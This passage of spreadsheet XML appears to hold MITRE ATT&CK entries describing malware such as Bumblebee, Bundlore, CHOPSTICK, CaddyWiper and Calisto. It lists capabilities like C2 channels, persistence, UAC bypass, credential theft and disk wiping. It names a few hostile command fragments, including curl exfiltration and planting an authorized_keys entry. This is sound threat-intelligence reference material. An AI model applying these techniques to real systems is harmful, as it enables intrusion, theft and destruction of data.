    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can compress data stolen from the Registry and volume shadow copies prior to exfiltration.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use asynchronous procedure call (APC) injection to execute commands received from C2.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to bypass UAC to deploy post exploitation tools with elevated privileges.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use a COM object to execute queries to gather system information.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can capture and compress stolen credentials from the Registry and volume shadow copies.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can search for tools used in static analysis.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can deobfuscate C2 server responses and unpack its code on targeted hosts.(Citation: Proofpoint Bumblebee April 2022)(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>The [Bumblebee](https://attack.mitre.org/software/S1039) loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can send collected data in JSON format to C2.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use backup C2 servers if the primary server fails.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can uninstall its loader through the use of a `Sdl` command.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can download and execute additional payloads including through the use of a `Dex` command.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bumblebee](https://attack.mitre.org/software/S1039) has relied upon a user opening an ISO file to enable execution of malicious shortcut files and DLLs.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Cybereason Bumblebee August 2022)(Citation: Medium Ali Salem Bumblebee April 2022)
</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has relied upon a user downloading a file from a OneDrive link for execution.(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has named component DLLs "RapportGP.dll" to match those used by the security company Trusteer.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use multiple Native APIs.(Citation: Proofpoint Bumblebee April 2022)(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has been delivered as password-protected zipped ISO files and used control-flow-flattening to obfuscate the flow of functions.(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use `odbcconf.exe` to run DLLs on targeted hosts.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use PowerShell for execution.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can identify processes associated with analytical tools.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can inject code into multiple processes on infected endpoints.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can check the Registry for specific keys.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has used `rundll32` for execution of the loader component.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can achieve persistence by copying its DLL to a subdirectory of %APPDATA% and creating a Visual Basic Script that will load the DLL via a scheduled task.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can identify specific analytical tools based on running processes.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Bumblebee](https://attack.mitre.org/software/S1039) can use `LoadLibrary` to attempt to execute GdiPlus.dll.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bumblebee](https://attack.mitre.org/software/S1039) has gained execution through luring users into opening malicious attachments.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Cybereason Bumblebee August 2022)(Citation: Medium Ali Salem Bumblebee April 2022)
</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has been spread through e-mail campaigns with malicious links.(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to base64 encode C2 server responses.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can encrypt C2 requests and responses with RC4(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to search for designated file paths and Registry keys that indicate a virtualized environment from multiple products.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can enumerate the OS version and domain on a targeted system.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to identify the user name.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to set a hardcoded and randomized sleep interval.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to perform anti-virtualization checks.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can create a Visual Basic script to enable persistence.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has been downloaded to victim's machines from OneDrive.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use `cmd.exe` to drop and run files.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use WMI to gather system information and to spawn processes for code injection.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can use AppleScript to inject malicious JavaScript into a browser.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can install malicious browser extensions that are used to hijack user searches.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used &lt;code&gt;openssl&lt;/code&gt; to decrypt AES encrypted payload data. [Bundlore](https://attack.mitre.org/software/S0482) has also used base64 and RC4 with a hardcoded key to deobfuscate data.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can change browser security settings to enable extensions to be installed. [Bundlore](https://attack.mitre.org/software/S0482) uses the &lt;code&gt;pkill cfprefsd&lt;/code&gt; command to prevent users from inspecting processes.(Citation: MacKeeper Bundlore Apr 2019)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has been spread through malicious advertisements on websites.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) uses the &lt;code&gt;curl -s -L -o&lt;/code&gt; command to exfiltrate archived data to a URL.(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) prompts the user for their credentials.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) uses the &lt;code&gt;mktemp&lt;/code&gt; utility to make unique file and directory names for payloads, such as &lt;code&gt;TMP_DIR=`mktemp -d -t x&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can download and execute new versions of itself.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can execute JavaScript by injecting it into the victim's browser.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchAgent.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchDaemon.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) changes the permissions of a payload using the command &lt;code&gt;chmod -R 755&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has attempted to get users to execute a malicious .app file that looks like a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has disguised a malicious .app file as a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has obfuscated data with base64, AES, RC4, and bz2.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used the &lt;code&gt;ps&lt;/code&gt; command to list processes.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used Python scripts to execute payloads.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) creates a new key pair with &lt;code&gt;ssh-keygen&lt;/code&gt; and drops the newly created user key in &lt;code&gt;authorized_keys&lt;/code&gt; to enable remote login.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has the ability to enumerate what browser is being used as well as version information for Safari.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) will enumerate the macOS version to determine which follow-on behaviors to execute using &lt;code&gt;/usr/bin/sw_vers -productVersion&lt;/code&gt;.(Citation: MacKeeper Bundlore Apr 2019)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) uses HTTP requests for C2.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>The [CALENDAR](https://attack.mitre.org/software/S0025) malware communicates through the use of events in Google Calendar.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[CALENDAR](https://attack.mitre.org/software/S0025) has a command to run cmd.exe to execute commands.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to download and install a remote payload.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has been executed through users being lured into opening malicious e-mail attachments.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has used a custom base64 alphabet to decode files.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to delete downloaded files from a compromised host.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download and execute a remote file via [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to execute command line arguments on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.(Citation: Talos CCleanup 2017)(Citation: Intezer Aurora Sept 2017)(Citation: Avast CCleaner3 2018)</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008) if communications with the primary command and control server are lost.(Citation: Talos CCleanup 2017)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with TLS.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote command execution.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Part of [APT28](https://attack.mitre.org/groups/G0007)'s operation involved using [CHOPSTICK](https://attack.mitre.org/software/S0023) modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic.(Citation: FireEye APT28)(Citation: ESET Sednit Part 2)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008), domains are generated by concatenating words from lists.(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) can switch to a new C2 channel if the current one is broken.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>An older version of [CHOPSTICK](https://attack.mitre.org/software/S0023) has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote file transmission.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) used a proxy server between victims and the C2 server.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing keylogging.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over SMTP and POP3.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) may store RC4 encrypted configuration information in the Windows Registry.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) provides access to the Windows Registry, which can be used to gather information.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>Part of [APT28](https://attack.mitre.org/groups/G0007)'s operation involved using [CHOPSTICK](https://attack.mitre.org/software/S0023) modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) has the capability to capture screenshots.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) checks for antivirus and forensics software.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with RC4.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023)  includes runtime checks to identify an analysis environment and prevent execution on it.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over HTTP.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) has created password-protected RAR, WinImage, and zip archives to be exfiltrated.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) has exfiltrated data in HTTP POST headers.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) searches for specified files.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) contains unused machine instructions in a likely attempt to hinder analysis.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) downloads another dropper from its C2 server.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over SMTP and POP3 for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) obfuscates strings using a custom stream cipher.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) is installed via execution of rundll32 with an export named "init" or "InitW."(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are Base64-encoded.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over HTTP for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has come signed with revoked certificates.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to self delete.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to remove values it writes to the Registry.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can download additional tools to a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has been delivered via malicious documents with embedded macros.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can write to the Registry under the &lt;code&gt;%windir%&lt;/code&gt; variable to execute tasks.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can use the schtasks utility to bypass UAC.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has been packed with UPX.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can search loaded modules, PEB structure, file paths, Registry keys, and memory to determine if it is being debugged or running in a virtual environment.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can use GET requests to download additional payloads from C2.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[Cachedump](https://attack.mitre.org/software/S0119) can extract cached password hashes from cache entry information.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) can work alphabetically through drives on a compromised system to take ownership of and overwrite all files.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) has the ability to destroy information about a physical drive's partitions including the MBR, GPT, and partition entries.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) can enumerate all files and directories on a compromised host.(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 )</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`.(Citation: Cisco CaddyWiper March 2022)</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) can obtain a list of current processes.(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 )</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. [CaddyWiper](https://attack.mitre.org/software/S0693) can also halt execution if the compromised host is identified as a domain controller.(Citation: Cisco CaddyWiper March 2022)(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 )</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) can modify ACL entries to take ownership of files.(Citation: Cisco CaddyWiper March 2022)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to identify open windows on the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to compress stolen data into a .cab file.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to record audio from the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal data from the clipboard.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to log keystrokes on the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal information about printers and the documents sent to printers.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to capture screenshots and webcam photos.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to discover information about the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) adds permissions and remote logins to all users.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses the &lt;code&gt;zip -r&lt;/code&gt; command to compress the data collected on the local system.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) collects information on bookmarks from Google Chrome.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) can collect data from user directories.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to use &lt;code&gt;rm -rf&lt;/code&gt; to remove folders and files from the victim's machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) presents an input prompt asking for the user's login and password.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to upload and download files to the victim's machine.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) collects Keychain storage data and copies those passwords/tokens to a file.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) adds a .plist file to the /Library/LaunchAgents folder to maintain persistence.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses launchctl to enable screen sharing on the victim’s machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to add its own account to the victim's machine.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274)'s installation file is an unsigned DMG image under the guise of Intego’s security solution for mac.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) runs the &lt;code&gt;ifconfig&lt;/code&gt; command to obtain the IP address from the victim’s machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) has the capability to download a file to the victim from the C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) uses AES to encrypt C2 traffic.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) has the capability to create a reverse shell on victims.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) exfiltrates collected data over email via SMTP/S and POP3/S C2 channels.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can obtain victim drive information as well as a list of folders in C:\Program Files.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can download a payload for execution.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) uses SMTP/S and POP3/S for C2 communications by sending and receiving emails.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
